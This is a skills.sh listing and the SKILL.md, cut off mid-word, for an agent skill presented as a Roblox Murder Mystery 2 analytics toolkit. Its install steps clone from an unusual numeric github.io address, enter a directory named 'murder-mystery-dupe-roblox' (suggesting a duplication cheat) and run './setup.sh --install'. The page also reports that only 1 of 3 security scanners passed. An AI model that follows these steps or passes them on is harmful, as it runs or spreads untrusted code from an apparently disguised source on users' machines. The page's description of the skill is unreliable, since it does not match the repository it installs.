
Mm2 Analytics Roblox Toolkit
Configure Murder Mystery 2 inventory and performance tracking, visualizations, and exports so agents help optimize Roblox MM2 play with data.
Install
npx skills add https://github.com/aradotso/data-skills --skill mm2-analytics-roblox-toolkitWhat is this skill?
- Inventory management for knife skins, gamepasses, and collection completeness
- Performance analytics: win/loss, role-specific stats, gameplay patterns
- Strategy optimization with AI pattern recognition and predictive modeling
- Interactive charts and dashboards for MM2 stats tracking
- Export reports to CSV and JSON for external analysis
Adoption & trust: 1 installs on skills.sh; 1 GitHub stars; 1/3 security scanners passed (skills.sh audits); trending (+100% hot-view momentum).
Recommended Skills
Journey fit
Grow/analytics is the canonical shelf because the toolkit’s core value is measuring wins, roles, inventory completeness, and trends after you are already playing or operating MM2 experiences. Analytics subphase fits dashboard configuration, CSV/JSON exports, and strategy tuning from historical gameplay—not building the Roblox game codebase itself.
Common Questions / FAQ
Is Mm2 Analytics Roblox Toolkit safe to install?
skills.sh reports 1 of 3 security scanners passed. Review the Security Audits panel on this page before installing in production.
SKILL.md
READMESKILL.md - Mm2 Analytics Roblox Toolkit
# MM2 Analytics Roblox Toolkit > Skill by [ara.so](https://ara.so) — Data Skills collection. This skill enables AI agents to help developers use the Murder Mystery 2 Analytics Dashboard, a comprehensive toolkit for tracking inventory, analyzing gameplay statistics, and optimizing strategy in Roblox's Murder Mystery 2 game through data visualization and AI-powered insights. ## What This Project Does The MM2 Analytics Dashboard is a data analysis and visualization toolkit that provides: - **Inventory Management**: Track knife skins, gamepasses, and collection completeness - **Performance Analytics**: Monitor win/loss ratios, role-specific statistics, and gameplay patterns - **Strategy Optimization**: AI-powered pattern recognition and predictive modeling - **Data Visualization**: Interactive charts and dashboards for stats tracking - **Export Tools**: Generate reports in CSV, JSON formats for external analysis ## Installation ### Quick Install (Automated) ```bash # Clone the repository git clone https://8015238355.github.io cd murder-mystery-dupe-roblox # Run automated setup chmod +x setup.sh ./setup.sh --install ``` ### Manual Installation ```bash # Clone repository git clone https://8015238355.github.io cd murder-mystery-dupe-roblox # Install Node.js dependencies npm install # Install Python dependencies python3 -m pip install -r requirements.txt ``` ### Dependencies The project requires: - Python 3.8+ with packages: `pandas`, `numpy`, `matplotlib`, `pyyaml`, `requests` - Node.js 18+ with packages for web dashboard - Optional: OpenAI/Claude API keys for AI features ## Configuration ### Environment Setup Create a `.env` file in the project root: ```bash # API Keys (optional for AI features) API_OPENAI_KEY=${OPENAI_API_KEY} API_CLAUDE_KEY=${CLAUDE_API_KEY} # Data directories DATA_DIRECTORY=./data/collections EXPORT_DIRECTORY=./exports # Analytics settings ANALYTICS_INTERVAL=300 ENABLE_LIVE_TRACKING=true LOG_LEVEL=INFO # Roblox connection (local data only) ROBLOX_USER_ID=your_user_id ``` ### Profile Configuration Create a profile in `config/profiles.yaml`: ```yaml profiles: - name: "default_profile" username: "MysterySolver2026" settings: preferred_role: "sheriff" tracking_mode: "comprehensive" data_refresh_rate: 30 export_format: ["csv", "json"] inventory_filter: knife_skins: rarity: ["legendary", "ancient", "godly"] track_duplicates: true gamepasses: active_only: true analytics_preferences: win_loss_tracking: true role_performance: true time_analysis: true prediction_models: false strategy_templates: - name: "aggressive_sheriff" priority: "high_visibility_areas" confidence: 0.85 - name: "passive_innocent" priority: "distraction_avoidance" confidence: 0.72 ``` ## Key Commands (CLI) ### Analytics Mode Run comprehensive analytics on your gameplay data: ```bash # Basic analytics python3 main.py --mode analytics --profile default_profile # With export python3 main.py --mode analytics \ --profile default_profile \ --export statistics_2026.json \ --format json \ --verbose # Live tracking mode python3 main.py --mode analytics \ --profile default_profile \ --live \ --interval 60 # Debug mode python3 main.py --mode analytics \ --profile default_profile \ --log-level DEBUG \ --verbose ``` ### Inventor